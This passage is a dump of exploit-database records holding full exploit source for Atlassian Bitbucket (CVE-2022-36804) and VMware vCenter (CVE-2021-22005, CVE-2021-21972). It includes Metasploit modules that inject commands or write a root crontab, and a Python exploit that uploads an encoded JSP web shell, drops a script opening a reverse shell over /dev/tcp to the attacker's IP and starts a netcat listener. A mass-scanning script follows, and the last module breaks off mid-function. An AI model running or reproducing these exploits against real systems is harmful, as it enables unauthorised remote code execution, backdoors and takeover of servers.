'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],\n [ 'CVE', '2022-36804' ]\n ],\n 'Platform' => [ 'linux' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Type' => :linux_dropper,\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => %w[wget curl bourne],\n 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Type' => :unix_cmd,\n 'Arch' => ARCH_CMD,\n 'Payload' => { 'BadChars' => %(:/?#[]@) },\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }\n }\n ]\n ],\n 'DisclosureDate' => '2022-08-24',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ IOC_IN_LOGS ],\n 'SideEffects' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7990),\n OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),\n OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),\n OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'keep_cookies' => true,\n 'uri' => normalize_uri(target_uri.path, 'login')\n )\n\n return CheckCode::Unknown('Failed to receive response from application') unless res\n\n unless res.body.include?('Bitbucket')\n return CheckCode::Safe('Target does not appear to be Bitbucket')\n end\n\n footer = res.get_html_document&.at('footer')\n return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer\n\n version_str = footer.at('span')&.children&.text\n return CheckCode::Detected('Cannot find version string in footer') unless version_str\n\n matches = version_str.match(/v(\\d+\\.\\d+\\.\\d+)/)\n return CheckCode::Detected('Version unknown') unless matches && matches.length > 1\n\n version_str = matches[1]\n vprint_status(\"Found Bitbucket version: #{matches[1]}\")\n\n num_vers = Rex::Version.new(version_str)\n return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')\n\n major, minor, revision = version_str.split('.')\n case major\n when '6'\n return CheckCode::Appears\n when '7'\n case minor\n when '6'\n return CheckCode::Appears if revision.to_i < 17\n when '17'\n return CheckCode::Appears if revision.to_i < 10\n when '21'\n return CheckCode::Appears if revision.to_i < 4\n end\n when '8'\n case minor\n when '0', '1'\n return CheckCode::Appears if revision.to_i < 3\n when '2'\n return CheckCode::Appears if revision.to_i < 2\n when '3'\n return CheckCode::Appears if revision.to_i < 1\n end\n end\n\n CheckCode::Detected\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def authenticate\n print_status(\"Attempting to authenticate with user '#{username}' and password '#{password}'\")\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'j_username' => username,\n 'j_password' => password,\n 'submit' => 'Log in'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'dashboard'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res\n\n unless res.body.include?('Your work') && res.body.include?('Projects')\n fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')\n end\n\n @authenticated = true\n print_good('Successfully logged into Bitbucket!')\n end\n\n def find_public_repo\n print_status('Searching Bitbucket for publicly accessible repository')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::Disconnected, 'Did not receive a response') unless res\n json_data = JSON.parse(res.body)\n fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data\n\n unless json_data['size'] > 0\n fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')\n end\n\n # opt for public repos unless none exist.\n # Attempt to use a private repo if so\n repos = json_data['values']\n possible_repos = repos.select { |repo| repo['public'] == true }\n if possible_repos.empty? && @authenticated\n possible_repos = repos.select { |repo| repo['public'] == false }\n end\n\n fail_with(Failure::NotFound, 'There doesn\\'t appear to be any repos to use') if possible_repos.empty?\n possible_repos.each do |repo|\n project = repo['project']\n next unless project\n\n @project = project['key']\n @repo = repo['slug']\n break if @project && @repo\n end\n\n fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo\n print_good(\"Found public repo '#{@repo}' in project '#{@project}'!\")\n end\n\n def execute_command(cmd, _opts = {})\n uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'keep_cookies' => true,\n 'vars_get' =>\n {\n 'format' => 'zip',\n 'path' => Rex::Text.rand_text_alpha(2..5),\n 'prefix' => \"#{Rex::Text.rand_text_alpha(1..3)}\\x00--exec=`#{cmd}`\\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}\"\n }\n )\n end\n\n def exploit\n @authenticated = false\n authenticate unless username.blank? && password.blank?\n find_public_repo\n\n if target['Type'] == :linux_dropper\n execute_cmdstager(linemax: 6000)\n else\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37985", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:10", "description": "This Metasploit module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "zdt", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "1337DAY-ID-36874", "href": "https://0day.today/exploit/description/36874", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36874", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-27T13:45:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-25T00:00:00", "type": "zdt", "title": "VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-25T00:00:00", "id": "1337DAY-ID-36472", "href": "https://0day.today/exploit/description/36472", "sourceData": "# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: CHackA0101\n# Vendor Homepage: https://kb.vmware.com/s/article/82374\n# Software Link: https://www.vmware.com/products/vcenter-server.html\n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)\n# CVE: 2021-21972\n\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md\n\n#!/usr/bin/python2\n\nimport os\nimport urllib3\nimport argparse\nimport sys\nimport requests\nimport base64\nimport tarfile\nimport threading\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nmyargs=argparse.ArgumentParser()\nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True)\nmyargs.add_argument('-L','--local',help='Your local IP',required=True)\nargs=myargs.parse_args()\n\ndef getprompt(x):\n\tprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n\ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"):\n fullpath=\"../\" * 7 + path\n return fullpath.replace('\\\\','/').replace('//','/')\n\ndef createbackdoor(localip):\n # shell4.jsp\n backdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\"\n backdoor = base64.b64decode(backdoor).decode('utf-8')\n f = open(\"shell4.jsp\",\"w\")\n f.write(backdoor)\n f.close()\n # reverse.sh \n # After decoding overwrite string 'CUSTOM_IP' for local IP \n shell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\"\n shell=base64.b64decode(shell).decode('utf-8')\n shell=shell.replace('CUSTOM_IP',localip)\n f=open(\"reverse.sh\",\"w\")\n f.write(shell)\n f.close()\n # Move on with the payload\n payload_file=tarfile.open('payload.tar','w')\n myroute=getpath()\n getprompt('Adding web backdoor to archive')\n payload_file.add(\"shell4.jsp\", myroute)\n myroute=getpath(\"tmp/reverse.sh\")\n getprompt('Adding bash backdoor to archive')\n payload_file.add(\"reverse.sh\", myroute)\n payload_file.close()\n # cleaning up a little bit\n os.unlink(\"reverse.sh\")\n os.unlink(\"shell4.jsp\")\n getprompt('Backdoor file just was created.')\n\ndef launchexploit(ip):\n res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)\n if res.status_code == 200 and res.text == 'SUCCESS':\n getprompt('Backdoor was uploaded successfully!')\n return True\n else:\n getprompt('Backdoor failed to be uploaded. Target denied access.')\n return False\n\ndef testshell(ip):\n getprompt('Looking for shell...')\n shell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\"\n res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)\n if res.status_code==200:\n getprompt('Shell was found!.')\n response=res.text\n if True:\n getprompt('Shell is responsive.')\n try:\n response=re.findall(\"b>(.+)</\",response)[0]\n print('$>uname -a')\n print(response)\n except:\n pass\n return True\n else:\n getprompt('Sorry. Shell was not found.')\n return False\n\ndef opendoor(url):\n time.sleep(3)\n getprompt('Executing command.')\n requests.get(url, verify=False, timeout=1800)\n\t\ndef executebackdoor(ip, localip):\n url=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\"\n t=threading.Thread(target=opendoor,args=(url,))\n t.start()\n getprompt('Setting up socket '+localip+':443')\n os.system('nc -lnvp 443')\n\nif len(sys.argv)== 1:\n myargs.print_help(sys.stderr)\n sys.exit(1)\ncreatebackdoor(args.local)\nuploaded=launchexploit(args.target)\nif uploaded:\n tested=testshell(args.target)\n if tested:\n executebackdoor(args.target, args.local)\ngetprompt(\"Execution completed!\")\n", "sourceHref": "https://0day.today/exploit/36472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:47:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "zdt", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "1337DAY-ID-35863", "href": "https://0day.today/exploit/description/35863", "sourceData": "#-*- coding:utf-8 -*-\nbanner = \"\"\"\n 888888ba dP \n 88 `8b 88 \n a88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n 88 `8b. 88' `88 88 Y8ooooo. 88 88 \n 88 .88 88. .88 88 88 88. .88 \n 88888888P `88888P8 dP `88888P' `88888P' \n ooooooooooooooooooooooooooooooooooooooooooooooooooooo \n @time:2021/02/24 CVE-2021-21972.py\n C0de by NebulabdSec - @batsu \n \"\"\"\nprint(banner)\n\nimport threadpool\nimport random\nimport requests\nimport argparse\nimport http.client\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhttp.client.HTTPConnection._http_vsn = 10\nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'\n\nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\"\n\ndef get_ua():\n first_num = random.randint(55, 62)\n third_num = random.randint(0, 3200)\n fourth_num = random.randint(0, 140)\n os_type = [\n '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',\n '(Macintosh; Intel Mac OS X 10_12_6)'\n ]\n chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\n\n ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\n '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\n )\n return ua\n\ndef CVE_2021_21972(url):\n proxies = {\"scoks5\": \"http://127.0.0.1:1081\"}\n headers = {\n 'User-Agent': get_ua(),\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n targetUrl = url + TARGET_URI\n try:\n res = requests.get(targetUrl,\n headers=headers,\n timeout=15,\n verify=False,\n proxies=proxies)\n # proxies={'socks5': 'http://127.0.0.1:1081'})\n # print(len(res.text))\n if res.status_code == 405:\n print(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url))\n # print(\"[+] Command success result: \" + res.text + \"\\n\")\n with open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw:\n fw.write(url + '\\n')\n else:\n print(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\")\n # except Exception as e:\n # print(e)\n except:\n print(\"[-] \" + url + \" Request ERROR.\\n\")\ndef multithreading(filename, pools=5):\n works = []\n with open(filename, \"r\") as f:\n for i in f:\n func_params = [i.rstrip(\"\\n\")]\n # func_params = [i] + [cmd]\n works.append((func_params, None))\n pool = threadpool.ThreadPool(pools)\n reqs = threadpool.makeRequests(CVE_2021_21972, works)\n [pool.putRequest(req) for req in reqs]\n pool.wait()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\",\n \"--url\",\n help=\"Target URL; Example:http://ip:port\")\n parser.add_argument(\"-f\",\n \"--file\",\n help=\"Url File; Example:url.txt\")\n # parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \")\n args = parser.parse_args()\n url = args.url\n # cmd = args.cmd\n file_path = args.file\n if url != None and file_path ==None:\n CVE_2021_21972(url)\n elif url == None and file_path != None:\n multithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/35863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:47:02", "description": "This Metasploit module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "zdt", "title": "VMware vCenter Server File Upload / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "1337DAY-ID-35912", "href": "https://0day.today/exploit/description/35912", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # \"Shotgun\" approach to writing JSP\n Rank = ManualRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OVA file upload and path\n traversal in VMware vCenter Server to write a JSP payload to a\n web-accessible directory.\n\n Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.\n Note that later vulnerable versions of the Linux appliance aren't\n exploitable via the webshell technique. Furthermore, writing an SSH\n public key to /home/vsphere-ui/.ssh/authorized_keys works, but the\n user's non-existent password expires 90 days after install, rendering\n the technique nearly useless against production environments.\n\n You'll have the best luck targeting older versions of the Linux\n appliance. The Windows target should work ubiquitously.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and exploit\n 'mr_me', # Co-conspirator\n 'Viss' # Co-conspirator\n ],\n 'References' => [\n ['CVE', '2021-21972'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],\n ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],\n ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],\n ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],\n ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],\n ['URL', 'https://kb.vmware.com/s/article/2143838'],\n ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']\n ],\n 'DisclosureDate' => '2021-02-23', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'win'],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true on Windows\n 'Targets' => [\n [\n # TODO: /home/vsphere-ui/.ssh/authorized_keys\n 'VMware vCenter Server <= 6.7 Update 1b (Linux)',\n {\n 'Platform' => 'linux'\n }\n ],\n [\n 'VMware vCenter Server <= 6.7 Update 3j (Windows)',\n {\n 'Platform' => 'win'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp',\n 'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\n 'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>\n OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me\n OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu\n ])\n end\n\n def spray_and_pray_min\n datastore['SprayAndPrayMin']\n end\n\n def spray_and_pray_max\n datastore['SprayAndPrayMax']\n end\n\n def spray_and_pray_range\n (spray_and_pray_min..spray_and_pray_max).to_a\n end\n\n def check\n # Run auxiliary/scanner/vmware/esx_fingerprint\n super\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n 